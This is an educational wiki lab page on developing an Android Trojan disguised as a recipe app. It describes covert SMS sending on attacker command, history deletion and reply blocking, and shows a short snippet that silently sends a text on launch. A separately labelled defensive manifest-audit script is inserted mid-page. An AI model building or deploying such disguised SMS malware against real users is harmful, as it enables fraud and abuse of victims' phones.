Shiven Chawla edited this page Jun 27, 2017 · 3 revisions

Welcome to the Trojan_Recipe Wiki: Development of Trojan on Android

Special Notice

These labs are for educational purposes. Readers should act in accordance with hacking ethics and should not spread or use the code in these labs to harm other Android phone users for their own benefit. A more thorough specification of hacking ethics can be found here and here. Please read them carefully.

Objective

In this lab, we will develop an Android Trojan from scratch to demonstrate the concept of mobile malware on the Android platform. The main functionality of this Android Trojan is sending text messages to others according to a hacker's commands. To keep the user unaware of the malicious activity, the Trojan deletes all messaging history. The diagram below illustrates the workflow of this Android Trojan.

[Image: Objective]

The Development of the Android Trojan

The Trojan is disguised as an introduction to an Asian dish, Hong Shao Shi Zi Tou. We assume that the victim is interested in Asian food and has carelessly downloaded this app.

When the victim launches the application, the Trojan sends a notification to the hacker that encodes the user's IP address and a port number for malicious communication. The Trojan and the hacker can then set up a TCP/IP communication channel, over which the hacker sends commands to the Trojan on the victim's device. When it receives a command from the hacker, the Trojan parses the data packet, extracts the target users' phone numbers and the content of the malicious message, and sends the malicious messages to the target phone users. After sending the text messages, the Trojan deletes the messaging history. If the target phone users send complaint messages back to the user, the Trojan blocks those messages from reaching the user's phone.

Tutorial

Step 1: Installation

a) Download the Benign Recipe Application.
b) Start Android Studio and import the MalRecipe project.

Step 2: MainActivity

a) In “Project” view, navigate to MalRecipe → app → src → main → java → com.example.malrecipe → MainActivity.
[Image: TutorialStep2a]
b) Open the class MainActivity.java.
c) Go to the method called startServer().
d) Paste the content of the following code into the “MainActivity” class replacing the original content:

    PendingIntent pi;
    SmsManager sms;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        String msg = "android.telephony.SmsManager.STATUS_ON_ICC_SENT";
        PendingIntent piSent = PendingIntent.getBroadcast(MainActivity.this, 0, new Intent(msg), 0);

        sms = SmsManager.getDefault();
        sms.sendTextMessage("5556", null, "This is sample test message", piSent, null);
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        // Handle action bar item clicks here. The action bar will
        // automatically handle clicks on the Home/Up button, so long
        // as you specify a parent activity in AndroidManifest.xml.
        int id = item.getItemId();
        if (id == R.id.action_settings) {
            return true;
        }
        return super.onOptionsItemSelected(item);
    }

After step 2, your code should look like this:
[Image: TutorialStep2d]

Step 3: SMSReceiver

a) In “Android” view, navigate to app → res
[Image: TutorialStep3a]
b) Right click res, select New → Android resource directory

  • In the Directory name, type “menu” and press “Ok”:
    [Image: TutorialStep3b]

c) Right click and create a new “Menu resource file”:

  • Name it main and press “Ok”:
    [Image: TutorialStep3c1]
    [Image: TutorialStep3c2]
  • Leave the file blank and close it.

Step 4: AndroidManifest

a) In the same view, go to app → manifests → AndroidManifest.xml
b) Open the AndroidManifest.xml file
c) Paste the following code, Code 4.3, just before the last line of the file (the second-to-last line).

<uses-permission android:name="android.permission.SEND_SMS"/> 

Your code should look like this after step 4:
[Image: TutorialStep4c]
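
Seen from the defender's side, the Step 4 change is the visible signal: a recipe app whose manifest requests SEND_SMS. The following is an added example, not part of the original lab, that audits a text-form AndroidManifest.xml for SMS-related permissions and for receivers registered for incoming SMS. The sample manifest is constructed, and the function name `audit_manifest` and the permissions listed beyond SEND_SMS are assumptions of this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# SEND_SMS is the permission the lab adds; the other entries are standard
# Android SMS permissions included here as an assumption of this example.
SMS_PERMISSIONS = {
    "android.permission.SEND_SMS": "can send text messages",
    "android.permission.READ_SMS": "can read stored messages",
    "android.permission.WRITE_SMS": "can modify or delete stored messages",
    "android.permission.RECEIVE_SMS": "can observe incoming messages",
}

# Constructed sample: a text-form manifest shaped like the lab's after Step 4.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.malrecipe">
    <application android:label="Trojan">
        <activity android:name=".MainActivity"/>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>"""


def audit_manifest(manifest_xml):
    """Return SMS permissions and SMS_RECEIVED receivers declared in a manifest.

    Expects text XML (source tree or decoded APK). For manifests from untrusted
    APKs, use a hardened parser such as defusedxml instead of ElementTree.
    """
    root = ET.fromstring(manifest_xml)
    findings = {"package": root.get("package"), "permissions": [], "sms_receivers": []}
    for node in root.iter("uses-permission"):
        name = node.get(ANDROID_NS + "name")
        if name in SMS_PERMISSIONS:
            findings["permissions"].append((name, SMS_PERMISSIONS[name]))
    for receiver in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in receiver.iter("action")}
        if SMS_RECEIVED in actions:
            findings["sms_receivers"].append(receiver.get(ANDROID_NS + "name"))
    return findings


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    print("package:", report["package"])
    for name, risk in report["permissions"]:
        print("  flagged permission:", name, "-", risk)
    for name in report["sms_receivers"]:
        print("  receiver registered for incoming SMS:", name)
```

A flagged permission is only a finding to compare against the app's stated purpose: a recipe viewer has no functional need to send, read or receive SMS.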

Demonstration

Step 1: Create Jelly Bean emulator

a) Open the AVD Manager.
[Image: DemonstrationStep1a]
b) Click on ‘Create Virtual Device’.
[Image: DemonstrationStep1b]
c) As you create a new emulator, make sure that you select Jelly Bean as the System Image (shown below). If you do not have it, you can click ‘Download’ to install it.
[Image: DemonstrationStep1c]
d) Give a suitable name for the emulator so that you know it is your Jelly Bean emulator.
[Image: DemonstrationStep1d]
e) Click Finish.

Step 2: Start two emulators

a) Open the “Android Virtual Device (AVD) Manager.”
[Image: DemonstrationStep2a]
b) Start your Jelly Bean emulator first and then the default emulator provided by Android Studio (Nexus 5 API 21 x86).
[Image: DemonstrationStep2b]
c) When you start the emulators, take note of the port numbers at the top of the windows.
[Image: DemonstrationStep2c]
These numbers will be important in the rest of the lab.

Step 3: Install the MalRecipe app in the Jelly Bean emulator

a) Click the run button in the toolbar.
[Image: DemonstrationStep3a]
b) Choose to install and execute the app in the Jelly Bean emulator.
[Image: DemonstrationStep3b]
c) After the installation, we will see the MalRecipe app installed with the app name “Trojan”.
[Image: DemonstrationStep3c]
d) After starting the app, MalRecipe starts listening on port “7777”.
e) Check the SMS messages in the two emulators. We can see that the Nexus 5 emulator received a message from the Jelly Bean emulator; however, the Jelly Bean emulator has no record of sending the message.
[Image: DemonstrationStep3e]

Try closing the app in one emulator and opening it again. What do you observe?